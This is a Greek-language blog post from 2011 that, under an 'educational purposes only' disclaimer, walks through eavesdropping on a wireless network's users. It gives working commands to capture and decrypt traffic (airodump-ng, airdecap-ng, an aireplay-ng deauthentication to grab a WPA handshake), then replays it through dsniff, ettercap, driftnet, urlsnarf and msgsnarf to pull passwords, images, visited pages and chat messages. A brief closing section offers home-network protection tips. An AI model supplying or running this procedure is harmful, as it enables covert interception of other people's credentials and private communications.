ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι

Σάββατο, 24 Δεκεμβρίου 2011

Πως θα κρυφοκοιτας για κωδικους,συνομιλιες,φωτογραφιες απο ενα δικτυο χωρις να εισαι συνδεδεμενος


Αυτος ο οδηγος αν εφαρμοστει σε ξενο δικτυο ειναι παρανομος.ΔΕΝ ευθυνομαι για κακοβουλη χρηση του.

Τι θα χρειαστειτε;

1.Backtrack 5 R1
2.τον κωδικο του ασυρματου δικτυου


  • ανοιγουμε ενα τερματικο και γραφουμε :
  • airmon-ng start wlan0
  • airodump-ng mon0  και εδω βλεπουμε το bssid,channel και essid του δικτυου που θελουμε να παρακολουθησουμε τα σημειωνουμε καπου....παταμε ctrl+c και γραφουμε ....
  • airodump-ng  mon0 -w arxeio -c 1 --bssid 00:24:25:4E:56:90
     *οπου -w ειναι το ονομα που θα το αποθηκευσουμε -c το καναλι που εκπεμπει το δικτυο και --bssid η mac address του δικτυου. μετα  γραφουμε σε ενα αλλο τερματικο 
  • airdecap-ng -e NicktheSailor -w 123456 arxeio-01.cap οπου -e το ονομα του δικτυου το essid δλδ , -w για wep κωδικο -p για wpa κωδικο ( επισεις για wpa θελει -b mac address και να πιασετε το handshake *η εντολη για handshake ειναι aireplay-ng -0 4 -a ''router mac address'' -c ''station mac address'' mon0 ) και arxeio-01.cap το ονομα που δωσαμε να αποθηκευσει το airodump-ng
  • καθως εχουμε αποκρυπτογραφισει ολες τις πληροφοριες κλεινουμε ολα τα τερματικα και ανοιγουμε ενα καινουργιο παταμε 5 φορες shift+ctrl+T ωστε να μας ανοιξει 5 καρτελες(τερματικα) στο πρωτο γραφουμε  
  • dsniff -i lo η ettercap -Tzq -i lo *εμφανιζει κωδικους
  • driftnet -i lo -d /root/ *βλεπει εικονες και τις αποθηκευει στον φακελο root
  • urlsnarf -i lo *βλεπει τι σελιδες ανοιξανε στο δικτυο
  • msgsnarf -i lo *εμφανιζει την συνομιλια του msn
  •  τωρα γραφουμε cd /pentest/sniffers/tcpreplay παταμε enter και γραφουμε ./tcpreplay -i lo -t arxeio-01-dec.cap οπου το arxeio ειναι απο το παραπανω βημα μπορειτε να το ονομασετε οτι θελετε οταν κρυφακουτε ενα δικτυο.  οταν σας εμφανισει warning:packet #124134 has gone back in time τοτε θα σας εμφανιζει πληροφοριες στις καρτελες
  • Το tcpreplay θα κανει μια ψευδοαναμεταδωση οτι εχετε καταγραψει απο το airodump και θα σας εμφανισει στις 4 καρτελες αποτελεσματα δλδ με απλα λογια ειναι σαν να εχετε παρει μια καμερα και να καταγραφετε οποιον χρηστη χρησιμοποιει το δικτυο και τα παντα που κανει μεσω διαδικτυου και μετα να το βλεπετε με αυτα τα προγραμματα.
  • αν θελετε μπορειτε να γραψετε σε ενα αλλο τερματικο wireshark * open επιλεξετε το dec.cap αρχειο σας και στα filters αν γραψετε msnms θα βλεπετε τα μηνυματα msn http και βρειτε ajax/ κτλ θα βλεπετε συνομιλιες facebook
 Πως θα προστατευτειτε;

1.να εχετε δυσκολο κωδικο στο δικτυο σας ωστε να μην μπορει καποιος να τον σπασει με κανενα λεξικο.ποτε ημερομηνιες γεννησης,ποτε κινητα μονα τους,μπορειτε να κανετε συνδιασμο πχ 699999999nickthesail0r και παντα σε wpa/wpa2 θα εχετε το δικτυο σας επισεις μπορειτε να αλλαξετε το ονομα του δικτυου σας και να να βελετε κενο πχ.Nick the Sail0r
2.Allow multicast from Broadband Network να το εχετε off
3.Επισεις για οσους κλεβουνε ιντερνετ απο ξεκλειδωτα δικτυα θα ητανε καλο να γνωριζουν οτι πισω εχει η αχλαδα την ουρα καθως ολες οι εταιριες
παρεχουνε ολα τα ρουτερ  τους με κωδικο δεν σας κανει εντυπωση πως εσεις βρηκατε ξεκλειδωτο δικτυο το 2012;;;;;;

Δεν υπάρχουν σχόλια: